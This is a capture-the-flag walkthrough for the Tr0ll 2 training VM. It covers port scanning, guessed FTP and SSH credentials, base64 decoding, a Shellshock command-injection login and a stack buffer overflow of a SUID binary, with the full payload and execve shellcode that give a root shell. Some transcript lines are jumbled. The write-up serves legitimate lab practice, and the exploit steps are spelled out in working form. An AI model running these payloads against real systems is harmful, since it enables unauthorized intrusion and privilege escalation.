I rooted Tr0ll 1, so thought it would be rude not to try the second VM in the Tr0ll series… Tr0ll 2 requires a buffer overflow to perform local escalation, the first VM didn’t require any exploitation. However, like the first VM I’d say this is challenege is more a case of guessing credentials, trying things you think probably wont work.
Description
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)
Difficulty is beginner++ to intermediate.
##Enumeration
Enumeration process started.
nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST
Host is up (0.0026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.8
Network Distance: 2 hops
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
</p>
###Service Enumeration
Port | Service | Version Detection |
---|---|---|
|
FTP |
vsftpd 2.0.8 or later |
|
SSH |
OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) |
|
HTTP |
Apache httpd 2.2.22 ((Ubuntu)) |
###SSH Enumeration
Zoning out watching my Nmap scan complete I noticed, the hostname was Tr0ll. I attempted to login via ssh with Tr0ll
password: Tr0ll
, it worked ! But I instantly got booted off, tried a few things nothing worked… So I tried FTP.
###FTP Enumeration
I tired the same credentials against ftp and discovered a file called “noob” in the ftp root.
ftp noob
root:~# ftp 172.31.31.6
Connected to 172.31.31.6
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (172.31.31.6:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lmao.zip
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1474 bytes received in 0.02 secs (60.6 kB/s)
ftp> exit
221 Goodbye.
</p>
Attempting to extract lmao.zip failed, prompting for a noob
password.
Onto the next service then…
###HTTP Enumeration
Web browser showed:
nmap --script=http-enum -p80 -n 172.31.31.6
root:~# nmap --script=http-enum -p80 -n 172.31.31.6
Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT
Nmap scan report for 172.31.31.6
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
</p>
Entering /robots.txt url in the browser rendered:
The slash was stripped off with some sed sed 's./..g' robots.txt
dirb was then used to check the following urls.
They all rendered the same image (301’d).
Nothing exciting was in the page source:
cat_the_troll.jpg
was downloaded from all the above locations from the target and examined.
ls -la showed a slightly different file size for one of the images, I began by running each of the files through cat (cating the cat? - sorry).
I tired this against the previously downloaded lmao.zip
file, no luck. I tried y0ur_self
as web path like on tr0ll:1
Success, the web dir contained a text file http://172.31.31.6/y0ur_self/answer.txt
scrolling though from the browser it looked like the file was base64 encoded.
wget http://172.31.31.6/y0ur_self/answer.txt
root:~# wget http://172.31.31.6/y0ur_self/answer.txt
</p>
Decoding the file revealed it was massive, the following was used to decode and sort by line length:
base64 decoding
root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less
30 ItCantReallyBeThisEasyRightLOL </p>
The top line looked promising, ItCantReallyBeThisEasyRightLOL
I tried this against lmao.zip
unzip lmao.zip
root:~# unzip lmao.zip
Archive: lmao.zip[lmao.zip] noob password:
inflating: noob
</p>
Yes!
The contents of noob
SSH Shellshock
Attempting to login using the discovered key failed, with a messaging saying TRY HARDER LOL!
.
I tried to feed it commands by tagging them on the end, the connection hung then dropped with no message.
I googled some shellshock options and managed to spawn a shell with:
ssh -i noob [email protected] '() { :;}; /bin/bash'
shellshock ssh
root:~# ssh -i noob [email protected] '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
</p>
##Local Enumeration
Transfered my local enumeration script to the target, disclosing the following odd sticky bit files:
Each of the door directories contained a file called r00t, du -sh * in the parent dir choose_wisely
showed one of the files was larger - I started there.
od -S 1 r00t
was used against each of the files, the larget file contained:
bof.c - pretty good indication that Buffer Overflow was the next logical step (unless it’s more tr0ling).
##Exploit Development
###Fuzzing
I started by fuzzing with 300 A’s:
fuzzing linux binary
root:~# ./r00t $(python -c 'print "A" *300')
Segmentation fault
</p>
Bangin’ then I tried 250 no crash, adding 10 each time then subtracting when the seg fault occoured at 268 and the instruction pointer address at 269 Illegal instruction
.
Using gdb I located the address of ESP.
Padded with some NOPs - for a reliable landing.
Overwrote EIP with the location of ESP and tagged some shellcode on the end to exectute a shell.
###Final Exploit
Note: gdb drops privileges on SUID, in order to spawn the new shell with SUID you need to execute the exploit outside of gdb, or the shell will spawn as the unprivileged user.
The binaries in choose_wisely/door*
are rotated, the largest is the vulnerable binary.
Exploit Process
root:~#
du -sh *
12K door1
12K door2
16K door3
root:~#
cd door3
root:~#
./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" *
10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\
xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
root:~#
whoami
root
root:~#
cat /root/Proof.txt
You win this time young Jedi...
a70354f0258dcc00292c72aab3c8b1e4
##Root dance
##Thanks
Thanks to @maleus21 for creating this VM challenege.